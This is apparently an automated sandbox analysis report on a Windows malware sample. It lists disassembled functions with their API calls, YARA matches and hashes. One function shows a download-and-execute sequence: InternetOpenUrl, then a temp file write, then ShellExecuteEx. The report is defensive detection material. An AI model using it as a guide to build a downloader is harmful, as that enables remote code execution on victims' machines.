                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                            • Instruction ID: 316fab75cdca8c204f77335740380c5cf636f58c06b371094cabf143150724a7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0301D676A106048FDF21CF24C904BAB37F9FB86216F4555B6D90AD7381E774A941CB90
                                                                                                                                                                                                                                            Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040214A
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00402151
                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                                                                                                                                                                                                            • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                                                                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0040227F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                                                                                                                                                            • String ID: Tahoma
                                                                                                                                                                                                                                            • API String ID: 3832963559-3580928618
                                                                                                                                                                                                                                            • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                            • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                                                                                                                                                                                                            Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 004025CD
                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                                                                                                                                                                                            • ReleaseCapture.USER32 ref: 004025F2
                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00402619
                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                                                                                                                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00402738
                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00402754
                                                                                                                                                                                                                                            • SetCapture.USER32(?), ref: 004027A1
                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 004027D5
                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                                                                                                                                                                                            • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 0040280D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                                                                                                                                                            • String ID: gya
                                                                                                                                                                                                                                            • API String ID: 2545303185-1989253062
                                                                                                                                                                                                                                            • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                            • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                                                                                                                                                                                                            Function 024BE919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$Info
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2509303402-0
                                                                                                                                                                                                                                            • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                            • Instruction ID: 7470ea8a20f3ebfb693555afe86e06abf961ee06afc84aeba07f5b0c9472dc93
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1B1AE71A002099FDB62DF69C880BEFBBF5BF49304F64416EE499A7341DB75A841CB60
                                                                                                                                                                                                                                            Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$Info
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2509303402-0
                                                                                                                                                                                                                                            • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                            • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                                                                                                                                                                                            Function 024CA85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 024CA8A3
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C0F
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C21
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C33
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C45
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C57
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C69
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C7B
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C8D
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C9F
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CB1
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CC3
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CD5
                                                                                                                                                                                                                                              • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CE7
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA898
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA8BA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA8CF
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA8DA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA8FC
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA90F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA91D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA928
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA960
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA967
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA984
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA99C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                                                                            • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                            • Instruction ID: 4172addc0a296edae16ff608617903e37be4f25d1e727db2fdbd0689dff5eb02
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90318A396042189BEBB4AF3ED840B5BB7E9AF00754F31886FE449D6650DB70A8508BA4
                                                                                                                                                                                                                                            Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                                                                                                                                                                                              • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A631
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A653
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A668
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A673
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A695
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A6A8
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A6B6
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A6C1
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A6F9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A700
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A71D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043A735
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                                                                            • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                            • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                                                                                                                                                                                                            Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                            • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                                                                                                                                                                                                            Function 02492C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02492C7E
                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02492C94
                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000105,?), ref: 02492CB0
                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02492CC6
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02492CFF
                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02492D3B
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02492D58
                                                                                                                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 02492DCF
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00008000), ref: 02492DE4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                                                            • API String ID: 838076374-4251816714
                                                                                                                                                                                                                                            • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                                                                                                                                                            • Instruction ID: 87599a9e4dd94e7c45227a6dc8abfde4c5174a8f5a71db35cd1dcf5b97c66825
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F41407194021DAEEB20DF649C85FEA7BBCFF05745F0081EAA545E2150DFB09E858FA4
                                                                                                                                                                                                                                            Function 024AEEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024AF228,00000004,024A7D87,00000004,024A8069), ref: 024AEEF9
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000,?), ref: 024AEF05
                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(advapi32.dll,?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000), ref: 024AEF15
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00447430), ref: 024AEF2B
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF41
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF58
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF6F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF86
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF9D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                            • String ID: advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                            • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                            • Instruction ID: 5094c6e2bcea075d3313d2a7846d9035d3d1bbbe03e89dfc1d5aca356291f4ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A72181B1904711BFE7106FB49C08A5ABFA8EF19B16F004A2BF556E3600CBBC94418FA4
                                                                                                                                                                                                                                            Function 024AEEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024AF228,00000004,024A7D87,00000004,024A8069), ref: 024AEEF9
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000,?), ref: 024AEF05
                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(advapi32.dll,?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000), ref: 024AEF15
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00447430), ref: 024AEF2B
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF41
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF58
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF6F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF86
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF9D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                            • String ID: advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                            • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                            • Instruction ID: 67b99fa2203f2466764ca8cb5f16755750311b1da076590b33f09902df0306e7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 172192B1904711BFE7106F749C08A5ABFECEF09B16F004A2BF556D3600CBBC94418BA8
                                                                                                                                                                                                                                            Function 024A24A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024A670B), ref: 024A24B6
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024A24C4
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024A24D2
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024A670B), ref: 024A2500
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 024A2507
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A2522
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A252E
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2544
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2552
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                            • String ID: kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                            • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                            • Instruction ID: fb198a6187ad5218e4a28ca95cd2a7646b6af406393cbf0691321f886d3eb6d4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5611E5799003117FE711BB756C79A6B3BECAE15B12720052BFC02E3291EBB8D5009A6C
                                                                                                                                                                                                                                            Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
